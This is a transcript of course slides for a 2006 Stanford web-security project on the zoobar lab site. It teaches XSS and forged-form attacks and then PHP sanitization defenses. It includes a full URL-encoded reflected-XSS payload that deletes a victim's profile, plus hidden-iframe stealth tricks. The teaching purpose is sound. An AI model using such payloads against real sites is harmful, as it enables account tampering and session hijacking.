1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.
-
date post
19-Dec-2015 -
Category
Documents
-
view
215 -
download
2
Transcript of 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.
![Page 1: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/1.jpg)
1
Project 2: Web App Security
Collin Jackson
CS 155 Spring 2006
![Page 2: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/2.jpg)
2
Deadlines
![Page 3: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/3.jpg)
3
Part 1
Attacks
![Page 4: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/4.jpg)
4
Overview
• Explore severalattack types
• Requires botheffectiveness and stealth
Learn:• How an attacker can evade sanitization• Consequences of an exploit• JavaScript• Very basic CSS
![Page 5: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/5.jpg)
5
Attack A: Cookie Theft Use URL encoding Could hijack
session
Attack C: Login Snooping Evade sanitization Handle DOM
events
Attacks
Attack B: Silent Transfer Navigate browser Use iframes, forms
Attack D: Profile Worm Confuse site scripts Replicate
zoobar.orglink
emailzoobar.org
formbadguy.com
stanford.eduredirect
badguy.comzoobar.orgform
zoobar.org
![Page 6: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/6.jpg)
6
JavaScript
Browser scripting language with C-like syntaxSandboxed, garbage collectedClosures
var x = 3; var y = function() { alert(x); }; return y;
Encapsulation/objectsfunction X() { this.y = 3; } var z = new X();
alert(z.y);
Can interpret data as code (eval)Browser-dependent
![Page 7: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/7.jpg)
7
Invoking JavaScript
Tags: <script>alert( ‘Hello world!’ )</script>Links: javascript:alert( ‘Hello world!’ ) Wrap code in “void” if it has return value
Event handlers: <form onsubmit=“alert( ‘Hello world!’ )”><iframe onload=“alert( ‘Hello world!’ )”>CSS (IE only)<style>body { background: url(javascript:alert( ‘Hello world!’ ));
}</style>
![Page 8: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/8.jpg)
8
DOM Manipulation Examples
document.getElementByID(id)document.getElementsByTagName(tag)document.write(htmltext)document.createElement(tagname)document.body.appendChild(node)document.forms[index].fieldname.value = …document.formname.fieldname.value = …frame.contentDocument.getElementById(id)
![Page 9: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/9.jpg)
9
Arrays and Loops
Example: Change href of all links on a page
var links = document.getElementsByTagName(‘a’);
for(var i = 0; i < links.length; i++) { var link = links[i]; link.href = “javascript:alert(‘Sorry!’);”;}
![Page 10: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/10.jpg)
10
Other Useful Functions
Navigation document.location document.formname.submit() document.forms[0].submitfield.click()
Delayed Events node.addEventListener(eventname,
handler, useCapture) node.removeEventListener(eventna
me, handler, useCapture) window.setTimeout(handler,
milliseconds)
![Page 11: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/11.jpg)
11
Stealthy Styles
var node = document.getElementByID(“mynodeid”);
node.style.display = ‘none’; // may not load at all
node.style.visibility = ‘hidden’; // still takes up space
node.style.position = ‘absolute’; // not included in flow
document.write( // can also write CSS rules to page“<style>#mynodeid { visibility:hidden; }</style>”);
![Page 12: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/12.jpg)
12
Example: Profile Deleter
Malicious hyperlink deletes profile of user who clicks itOnly works when user logged in User might have multiple tabs open Might have chosen/forgotten not to log
out Might appear in another user’s profile
Uses vulnerability in users.php from Attack AConstructs profile deletion form and submits it
???
![Page 13: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/13.jpg)
13
Find vulnerabilitySite reflectsquery parameter in input field
Link can includeanything wewant here
![Page 14: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/14.jpg)
14
Copy form data
View sourceto find formfields
Create copycat form with ourmodifications
![Page 15: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/15.jpg)
15
Close previous<input>,<form>
Buttonclick triggersform submit
URL encode
![Page 16: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/16.jpg)
16
Debugging
Check error
It didn’t work.Open JavaScriptconsole
Undefined No properties!
Two formswith same name
![Page 17: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/17.jpg)
17
Now withcorrectform
Fixed version
![Page 18: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/18.jpg)
18
Profile deleted
Final Test
users.phpreplacedwith index.php
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E
![Page 19: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/19.jpg)
19
Post form into hidden iframe <form name=F action=/index.php target=myframe>…<iframe name=myframe style=“visibility:hidden”>…
Open page with form in hidden iframe
<iframe name=myframe style=“visibility:hidden”>…<script>document.myframe.contentDocument.forms[0] .profile_update.value =“”;</script>
Stealthier approaches
![Page 20: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/20.jpg)
20
Part 2
Defenses
![Page 21: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/21.jpg)
21
Goals
Learn:• How easy it is to make mistakes• That even simple code can be hard to secure• Techniques for appropriate input validation• PHP• Very basic SQL
Little programming knowledge can be a dangerous thing
![Page 22: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/22.jpg)
22
PHP: Hypertext Preprocessor
Server scripting language with C-like syntaxCan intermingle static HTML and code
<input value=<?php echo $myvalue; ?>>Encapsulation/objects
class X { var $y = 3; } $z = new X(); echo $z->y;
Can embed variables in double-quote strings$user = “world”; echo “Hello $user!”;
or $user = “world”; echo “Hello” . $user . “!”;
Form data in global arrays $_GET, $_POST, …
![Page 23: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/23.jpg)
23
SQL
Widely used database query languageFetch a set of recordsSELECT * FROM Person WHERE Username=‘grader’
Add data to the tableINSERT INTO Person (Username, Zoobars)
VALUES (‘grader’, 10)
Modify dataUPDATE Person SET Zoobars=42 WHERE PersonID=5
Query syntax (mostly) independent of vendor
![Page 24: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/24.jpg)
24
File structure
index.php users.phptransfer.phplogin.phpincludes/ auth.php (cookie authentication) common.php (includes everything else) navigation.php (site template)
db/ zoobar/
Person.txt (must be writable by web server)Includes /usr/class/cs155/projects/pp2/txt-db-api/…
Only edit these files
![Page 25: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/25.jpg)
25
txt-db-api
Third-party text file database libraryData can be int, string, and autoincrementNeed to escape strings: \’ \” \\Actually magic_quotes_gpc does this for us$recipient = $_POST[‘recipient’]; // already escaped$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executeQuery($sql);if( $rs->next() )
$id = $rs->getCurrentValueByName(‘PersonID’);
![Page 26: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/26.jpg)
26
Attack A: Cookie Theft
Attack C: Login Snooping
Defenses to Part 1
Attack B: Silent Transfer
Attack D: Profile Worm
![Page 27: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/27.jpg)
27
Sanitization Techniques
addslashes(string) Already done by magic_quotes_gpc Inverse: stripslashes(string)htmlspecialchars(string [, quote_style]) Converts & < > ” to HTML entities Use ENT_QUOTES to change ’ to ' strip_tags(string, [, allowable_tags]) Max tag length 1024 Does not sanitize tag propertiespreg_replace(pattern, replacement, subject)More info: http://php.net
![Page 28: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/28.jpg)
28
More XSS hunting
Look for untrusted input used as outputNote sanitization already applied to each variable Form data has magic_quotes_gpc, db data does not
Determine browser context for output Inside a quoted string within a tag – worry about ’ ” Outside a tag – worry about < > Input to eval – very dangerous
Sanitize the output if necessary No penalty for erring on the side of caution But sanitizing multiple times may lead to problems
No credit for solving non-goals: SQL injection, etc.
![Page 29: 1 Project 2: Web App Security Collin Jackson CS 155 Spring 2006.](https://reader036.fdocuments.us/reader036/viewer/2022062714/56649d355503460f94a0cdcd/html5/thumbnails/29.jpg)
29
Good luck!
Start earlyAsk questionsBe creative